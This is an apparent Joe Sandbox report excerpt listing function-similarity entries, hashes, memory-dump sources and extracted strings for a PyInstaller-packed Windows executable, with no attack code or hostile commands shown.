                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                          • Opcode ID: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
                                                                                                                                                                                                                                                                          • Instruction ID: 7f7c5b7ec546a9b5cb790f735c20ea85bc40bb86c42ef801bd6f1e0b1961da9c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA018E61A08B4741EB08AF5A9910069EA95BFC9FE0BC88630DEBC17BE6CE3CD4018351
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,00000000,00007FF7FBDDB9A6,?,?,?,00007FF7FBDDAB67,?,?,00000000,00007FF7FBDDAE02), ref: 00007FF7FBDDF1AD
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
                                                                                                                                                                                                                                                                          • Instruction ID: 5feabec3b38531036c6561f90166eadf1933988bbc460292cf145377be562687
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92F04F05B0960781FF5C77A999512B5D2915F4DB40FC84430CD6E4A3E1DE1CE44483B2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,?,00007FF7FBDD0D24,?,?,?,00007FF7FBDD2236,?,?,?,?,?,00007FF7FBDD3829), ref: 00007FF7FBDDDBFA
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                          • Opcode ID: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
                                                                                                                                                                                                                                                                          • Instruction ID: d89cf33a4d83499ee5b8547bc66464a6b5bf44b707c78efb65805d1d322602ed
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F05804B0D24745FF5C76AE984127592A09F8C7A4FC84730DD7E8A2E2DE6CB48082B3
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                                                                                                          • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                                          • API String ID: 190572456-4266016200
                                                                                                                                                                                                                                                                          • Opcode ID: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
                                                                                                                                                                                                                                                                          • Instruction ID: 55fd9b791fb7db3a847d66f9b34bd3fb2d46b6d3fb4f59f69121df2605a3e45a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8412A7A4A0EB0791FB1DEB4CAC91174A2A1AF45784BC85535C83E066F4EF7CB548D2E3
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                                                                                                                                                                          • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                                                                                                                                                                          • API String ID: 2446303242-1601438679
                                                                                                                                                                                                                                                                          • Opcode ID: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                                                                                                                                                                                                                                          • Instruction ID: 5d535a9c07e215e5a631e12e24badba0ae4f9fb20fc0e81b989d86cd1f47e567
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BA19C7A608B8687E3189F55E48479AB360F788B84F904135DBAD03B64CF3DE164CB91
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                          • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                                          • Opcode ID: 462ebf29a53f9f8e0898a565754c8078d18c0a01f6b8af8c35fed8b76f3e05ac
                                                                                                                                                                                                                                                                          • Instruction ID: 1dd68727119e3e717047eda9a20e86b8179c970451be3b41014b9ec57ae4a11a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 462ebf29a53f9f8e0898a565754c8078d18c0a01f6b8af8c35fed8b76f3e05ac
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54B2E972E182878BE76C9EACD4507FDB7A1FB44388F805135DA2D57AD4DB38A500CB92
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00007FF7FBDC2A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF7FBDC101D), ref: 00007FF7FBDC8587
                                                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32 ref: 00007FF7FBDC85B6
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32 ref: 00007FF7FBDC860C
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDC29E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7FBDC87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF7FBDC101D), ref: 00007FF7FBDC2A14
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDC29E0: MessageBoxW.USER32 ref: 00007FF7FBDC2AF0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                                                                                                                                          • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                                                                                                                                          • API String ID: 2920928814-2573406579
                                                                                                                                                                                                                                                                          • Opcode ID: 6472fed7a38855fe53d018715946baf175a16c93e2266fbaa2446d02f1e91665
                                                                                                                                                                                                                                                                          • Instruction ID: 496a9ab063c6054c8d253f2603f8d29b8094153ea64c77d1dafb8b542e6b6d3e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6472fed7a38855fe53d018715946baf175a16c93e2266fbaa2446d02f1e91665
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E2160B5B08A4381E72CAB59E884675A265FF88384FC40135E56D836F4EF3CE54587A2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
                                                                                                                                                                                                                                                                          • Instruction ID: 6dbd0e9e6c97a12bdb53838a3d7258b683622501fd159da43dfb349f48a97af8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33318272609A8285EB689F64E8803ED7360FB84754F844039DB5D47AE4DF38D648C751
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                                                                                                                                                          • Opcode ID: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
                                                                                                                                                                                                                                                                          • Instruction ID: 6569dfdbe580138204f4c4974b26e6867b93353e443cb537c2ba4e4884549017
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE318536618B8286DB68DF28E8403AD73A0FB88794F904135EA9D43BA4DF3CD545CB51
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2227656907-0
                                                                                                                                                                                                                                                                          • Opcode ID: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
                                                                                                                                                                                                                                                                          • Instruction ID: 2c18f017345418f054b281d6f7a138920ea553e99460356aceab17be0c4902e1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4B1C422B1969341EB6CBBA998006B9E351EB44BE4F844131EE6D07BE5DF3CE541C393
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                          • Opcode ID: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
                                                                                                                                                                                                                                                                          • Instruction ID: 82c7960e8e6ba9957155b3ce650cc36f447f83dc9a75fa67d7aeae887e1eb921
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4119126B04F068AEB04DFA4E8442B873A0FB48758F441E30DA7D867A8DF7CE15483D1
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
